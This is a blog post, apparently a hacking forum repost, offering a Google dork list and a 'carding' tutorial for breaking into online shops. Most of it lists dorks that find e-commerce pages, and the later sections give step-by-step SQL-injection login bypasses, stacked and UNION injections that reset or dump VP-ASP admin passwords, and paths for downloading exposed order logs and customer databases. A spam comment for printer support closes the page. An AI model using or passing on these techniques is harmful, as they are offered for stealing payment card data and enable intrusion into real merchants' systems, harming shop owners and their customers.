- Google Dorks List
- inurl:".php?cat="+intext:"Paypal"+site:UK
- inurl:".php?cat="+intext:"/Buy Now/"+site:.net
- inurl:".php?cid="+intext:"online+betting"
- inurl:".php?id=" intext:"View cart"
- inurl:".php?id=" intext:"Buy Now"
- inurl:".php?id=" intext:"add to cart"
- inurl:".php?id=" intext:"shopping"
- inurl:".php?id=" intext:"boutique"
- inurl:".php?id=" intext:"/store/"
- inurl:".php?id=" intext:"/shop/"
- inurl:".php?id=" intext:"toys"
- inurl:".php?cid="
- inurl:".php?cid=" intext:"shopping"
- inurl:".php?cid=" intext:"add to cart"
- inurl:".php?cid=" intext:"Buy Now"
- inurl:".php?cid=" intext:"View cart"
- inurl:".php?cid=" intext:"boutique"
- inurl:".php?cid=" intext:"/store/"
- inurl:".php?cid=" intext:"/shop/"
- inurl:".php?cid=" intext:"Toys"
- inurl:".php?cat="
- inurl:".php?cat=" intext:"shopping"
- inurl:".php?cat=" intext:"add to cart"
- inurl:".php?cat=" intext:"Buy Now"
- inurl:".php?cat=" intext:"View cart"
- inurl:".php?cat=" intext:"boutique"
- inurl:".php?cat=" intext:"/store/"
- inurl:".php?cat=" intext:"/shop/"
- inurl:".php?cat=" intext:"Toys"
- inurl:".php?catid="
- inurl:".php?catid=" intext:"View cart"
- inurl:".php?catid=" intext:"Buy Now"
- inurl:".php?catid=" intext:"add to cart"
- inurl:".php?catid=" intext:"shopping"
- inurl:".php?catid=" intext:"boutique"
- inurl:".php?catid=" intext:"/store/"
- inurl:".php?catid=" intext:"/shop/"
- inurl:".php?catid=" intext:"Toys"
- inurl:".php?categoryid="
- inurl:".php?categoryid=" intext:"View cart"
- inurl:".php?categoryid=" intext:"Buy Now"
- inurl:".php?categoryid=" intext:"add to cart"
- inurl:".php?categoryid=" intext:"shopping"
- inurl:".php?categoryid=" intext:"boutique"
- inurl:".php?categoryid=" intext:"/store/"
- inurl:".php?categoryid=" intext:"/shop/"
- inurl:".php?categoryid=" intext:"Toys"
- inurl:".php?pid="
- inurl:".php?pid=" intext:"shopping"
- inurl:".php?pid=" intext:"add to cart"
- inurl:".php?pid=" intext:"Buy Now"
- inurl:".php?pid=" intext:"View cart"
- inurl:".php?pid=" intext:"boutique"
- inurl:".php?pid=" intext:"/store/"
- inurl:".php?pid=" intext:"/shop/"
- inurl:".php?pid=" intext:"toys"
- inurl:".php?prodid=
- inurl:".php?prodid=" intext:"shopping"
- inurl:".php?prodid=" intext:"add to cart"
- inurl:".php?prodid=" intext:"Buy Now"
- inurl:".php?prodid=" intext:"View cart"
- inurl:".php?prodid=" intext:"boutique"
- inurl:".php?prodid=" intext:"/store/"
- inurl:".php?prodid=" intext:"/shop/"
- inurl:".php?prodid=" intext:"toys"
- inurl:".php?productid='
- inurl:".php?productid=" intext:"shopping"
- inurl:".php?productid=" intext:"add to cart"
- inurl:".php?productid=" intext:"Buy Now"
- inurl:".php?productid=" intext:"View cart"
- inurl:".php?productid=" intext:"boutique"
- inurl:".php?productid=" intext:"/store/"
- inurl:".php?productid=" intext:"/shop/"
- inurl:".php?productid=" intext:"Toys"
- inurl:".php?product="
- inurl:".php?product=" intext:"shopping"
- inurl:".php?product=" intext:"add to cart"
- inurl:".php?product=" intext:"Buy Now"
- inurl:".php?product=" intext:"View cart"
- inurl:".php?product=" intext:"boutique"
- inurl:".php?product=" intext:"/store/"
- inurl:".php?product=" intext:"/shop/"
- inurl:".php?product=" intext:"toys"
- inurl:".php?product=" intext:"DVD"
- inurl:".php?products="
- inurl:".php?products=" intext:"shopping"
- inurl:".php?products=" intext:"add to cart"
- inurl:".php?products=" intext:"Buy Now"
- inurl:".php?products=" intext:"View cart"
- inurl:".php?products=" intext:"boutique"
- inurl:".php?products=" intext:"/store/"
- inurl:".php?products=" intext:"/shop/"
- inurl:".php?products=" intext:"toys"
- inurl:".php?products=" intext:"DVD"
- inurl:".php?proid="
- inurl:".php?proid=" intext:"shopping"
- inurl:".php?proid=" intext:"add to cart"
- inurl:".php?proid=" intext:"Buy Now"
- inurl:".php?proid=" intext:"View cart"
- inurl:".php?proid=" intext:"boutique"
- inurl:".php?proid=" intext:"/store/"
- inurl:".php?proid=" intext:"/shop/"
- inurl:".php?proid=" intext:"toys"
- inurl:".php?shopid="
- inurl:".php?shopid=" intext:"shopping"
- inurl:".php?shopid=" intext:"add to cart"
- inurl:".php?shopid=" intext:"Buy Now"
- inurl:".php?shopid=" intext:"View cart"
- inurl:".php?shopid=" intext:"boutique"
- inurl:".php?shopid=" intext:"/store/"
- inurl:".php?shopid=" intext:"/shop/"
- inurl:".php?shopid=" intext:"Toys"
- inurl:".php?itemid="
- inurl:".php?itemid=" intext:"shopping"
- inurl:".php?itemid=" intext:"add to cart"
- inurl:".php?itemid=" intext:"Buy Now"
- inurl:".php?itemid=" intext:"View cart"
- inurl:".php?itemid=" intext:"boutique"
- inurl:".php?itemid=" intext:"/shop/"
- inurl:".php?itemid=" intext:"/store/"
- inurl:".php?itemid=" intext:"Toys"
- inurl:".php?orderid="
- inurl:".php?orderid=" intext:"shopping"
- inurl:".php?orderid=" intext:"add to cart"
- inurl:".php?orderid=" intext:"Buy Now"
- inurl:".php?orderid=" intext:"View cart"
- inurl:".php?orderid=" intext:"boutique"
- inurl:".php?orderid=" intext:"/shop/"
- inurl:".php?orderid=" intext:"/store/"
- inurl:".php?orderid=" intext:"Toys"
- inurl:".php?catalogId="
- inurl:".php?catalogId=" intext:"shopping"
- inurl:".php?catalogId=" intext:"add to cart"
- inurl:".php?catalogId=" intext:"Buy Now"
- inurl:".php?catalogId=" intext:"View cart"
- inurl:".php?catalogId=" intext:"boutique"
- inurl:".php?catalogId=" intext:"/shop/"
- inurl:".php?catalogId=" intext:"/store/"
- inurl:".php?catalogId=" intext:"Toys"
- inurl:".php?aid="
- inurl:".php?aid=" intext:"shopping"
- inurl:".php?aid=" intext:"add to cart"
- inurl:".php?aid=" intext:"Buy Now"
- inurl:".php?aid=" intext:"View cart"
- inurl:".php?aid=" intext:"boutique"
- inurl:".php?aid=" intext:"/shop/"
- inurl:".php?aid=" intext:"/store/"
- inurl:".php?aid=" intext:"toys"
- inurl:".php?artid="
- inurl:".php?artid=" intext:"shopping"
- inurl:".php?artid=" intext:"add to cart"
- inurl:".php?artid=" intext:"Buy Now"
- inurl:".php?artid=" intext:"View cart"
- inurl:".php?artid=" intext:"boutique"
- inurl:".php?artid=" intext:"/shop/"
- inurl:".php?artid=" intext:"/store/"
- inurl:".php?artid=" intext:"toys"
- inurl:".php?articleid="
- inurl:".php?articleid=" intext:"shopping"
- inurl:".php?articleid=" intext:"add to cart"
- inurl:".php?articleid=" intext:"Buy Now"
- inurl:".php?articleid=" intext:"View cart"
- inurl:".php?articleid=" intext:"boutique"
- inurl:".php?articleid=" intext:"/shop/"
- inurl:".php?articleid=" intext:"/store/"
- inurl:".php?articleid=" intext:"toys"
- ##############################################
- Dork list +How to Do Carding- 2015 - March 20#
- ##############################################
- DORK CARDING 2015 AND HOW TO EXPLOIT
- ============Legion7sign============
- user.php?id=
- user.bmlid=
- user.jsp?id=
- user.cfm?id=
- user.htlm?id=
- user.php?CategoryID=
- user.php?shopID=
- user.php?shippingID=
- user.php?infoID=
- user.php?custID=
- user.php?webID=
- user.php?cad=
- How to exploit :
- [-]Tool
- -gr3enox exploit scanner
- Example dork :
- paypal : user.php?id=
- CreditCard : user.php?pay=
- Paypal :
- user.php?id= < you can edit this dork :
- customer.php?id=
- if you want to exploit just change the customer < & id < only
- example : payment.php?aspx=
- payment.php?jsp=
- Credit Card :
- user.php?pay= < example dork cc you can change :
- customer.php?pay=
- wanna try ?
- just change customer < & pay <
- example :
- amex.php?CategoryID=
- exploit sample :
- u.php?jsp=
- u.php?aspx=
- u.php?id=
- u.php?pay=
- u.php?cat=
- u.php?search=
- u.php?urlid=
- u.php?car=
- *PS : " You can add site like this : u.php?car=+site:uk
- =======IT'S AT YOUR OWN RISK=======
- ##############################
- Full Explanation For Carding##
- ##############################
- ###############
- Aluf Hack Team#
- ###############
- 1:
- google dork :--> inurl:"/cart.php?m="
- target looks lile :--> ...cart.php?m=view
- exploit: chage cart.php?m=view to /admin
- target whit exploit :-->
- Usename : 'or"="
- Password : 'or"=
- 2:
- google dork :--> allinurlroddetail.asp?prod=
- target looks like :--> xxxxx.org (big leters and numbers )
- exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
- target whit exploit :--> www.xxxxxx.org/fpdb/vsproducts.mdb
- 3:
- google dork :--> allinurl: /cgi-local/shopper.cgi
- target looks like :--> ....dd=action&key=
- exploit :--> ...&template=order.log
- target whit exploit :--> .....late=order.log
- 4:
- google dork :--> allinurl: Lobby.asp
- target looks like :--> www.xxxxx.com/mall/lobby.asp
- exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
- target whit exploit :--> www.xxxxx.com/fpdb/shop.mdb
- 5:
- google dork :--> allinurl:/vpasp/shopsearch.asp
- when u find a target put this in search box
- Keyword=&category=5); insert into tbluser (fldusername) values
- ('')--&SubCategory=&hide=&action.x=46&action.y=6
- Keyword=&category=5); update tbluser set fldpassword='' where
- fldusername=''--&SubCategory=All&action.x=33&action.y=6
- Keyword=&category=3); update tbluser set fldaccess='1' where
- fldusername=''--&SubCategory=All&action.x=33&action.y=6
- Jangan lupa untuk mengganti dan nya terserah kamu.
- Untuk mengganti password admin, masukkan keyword berikut :
- Keyword=&category=5); update tbluser set fldpassword='' where
- fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
- login page:
- 6:
- google dork :--> allinurl:/vpasp/shopdisplayproducts.asp
- target looks like :--> ....asp?cat=xxxxxx
- exploit :--> ...20union%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'-
- if this is not working try this ends
- %20'a%25'--
- %20'b%25'--
- %20'c%25'--
- after finding user and pass go to login page:
- 7:
- google dork :--> allinurl:/shopadmin.asp
- target looks like :--> www.xxxxxx.com/shopadmin.asp
- exploit:
- user : 'or'1
- pass : 'or'1
- 8:
- google.com :--> allinurl:/store/index.cgi/page=
- target looks like :--> ....shortblue.htm
- exploit :--> ../admin/files/order.log
- target whit exploit :--> .c....iles/order.log
- 9:
- google.com:--> allinurl:/metacart/
- target looks like :--> www.xxxxxx.com/metacart/about.asp
- exploit :--> /database/metacart.mdb
- target whit exploit :--> www.xxxxxx.com/metacart/database/metacart.mdb
- 10:
- google.com:--> allinurl:/DCShop/
- target looks like :--> www.xxxxxx.com/xxxx/DCShop/xxxx
- exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
- target whit exploit :--> www.xxxx.com/xxxx/DCShop/orders/orders.txt or www.xxxx.com/xxxx/DCShop/Orders/orders.txt
- 11:
- google.com:--> allinurl:/shop/category.asp/catid=
- target looks like :--> www.xxxxx.com/shop/category.asp/catid=xxxxxx
- exploit :--> /admin/dbsetup.asp
- target whit exploit :--> www.xxxxxx.com/admin/dbsetup.asp
- after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
- target for dl the data base :--> www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
- in db look for access to find pass and user of shop admins.
- 12:
- google.com:--> allinurl:/commercesql/
- target looks like :--> www.xxxxx.com/commercesql/xxxxx
- exploit :--> cgi-bin/commercesql/index.cgi?page=
- target whit exploit admin config :--> ..../adminconf.pl
- target whit exploit admin manager :--> ....in/manager.cgi
- target whit exploit order.log :--> ....iles/order.log
- 13:
- google.com:--> allinurl:/eshop/
- target looks like :--> www.xxxxx.com/xxxxx/eshop
- exploit :-->/cg-bin/eshop/database/order.mdb
- target whit exploit :--> ....base/order.mdb
- after dl the db look at access for user and password
- 14:
- 1/ search google: allinurl:"shopdisplayproducts.asp?id=
- --->=5
- 2/ find error by adding '
- --->=5'
- --->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467
- -If you don't see error then change id to cat
- --->=5'
- 3/ if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sppassword
- --->...on%20select%20 1%20from%20tbluser"having%201=1--sppassword
- --->error: 5' union select 1 from tbluser "having 1=1--sppassword.... The number of column in the two selected tables or queries of a union queries do not match......
- 4/ add 2,3,4,5,6.......until you see a nice table
- add 2
- ---->...on%20select%20 1,2%20from%20tbluser"having%201=1--sppassword
- then 3
- ---->...on%20select%20 1,2,3%20from%20tbluser"having%201=1--sppassword
- then 4 ---->...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sppassword
- ...5,6,7,8,9.... untill you see a table. (exp:...47)
- ---->...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sppassword
- ---->see a table.
- 5/ When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password
- --->...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sppassword
- 6/ Find link admin to login:
- try this first:
- or:
- Didn't work? then u have to find yourself:
- add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sppassword
- --->...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sppassword
- you'll see something like: ( lot of them)
- shopaddmoretocart.asp
- shopcheckout.asp
- shopdisplaycategories.asp
- ..............
- then guess admin link by adding the above data untill you find admin links
- 15:
- xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
- the most important thing here is xDatabase
- xDatabase: shopping140
- ok now the URL will be like this:
- ****://.victim.com/shop/shopping140.mdb
- if you didn't download the Database..
- Try this while there is dblocation.
- xDblocation
- resx
- the url will be:
- ****://.victim.com/shop/resx/shopping140.mdb
- If u see the error message you have to try this :
- ****://.victim.com/shop/shopping500.mdb
- download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com
- inside you should be able to find *** information.
- and you should even be able to find the admin username and password for the website.
- the admin login page is usually located here
- ****://.victim.com/shop/shopadmin.asp
- if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are
- Username: admin
- password: admin
- OR
- Username: vpasp
- password: vpasp
- Hope you enjoy this !!
Assinar:
Postar comentários (Atom)
1 comentários:
Clique aqui para comentáriosA printer is a human-made device; it will meet some glitches in future, just dial the toll-free number of HP printer support for customers 24/7.
HP Printer support | Epson Printer Support
Fora de tópico Mostrar Código Esconder Código Mostrar EmoticonEsconder Emoticon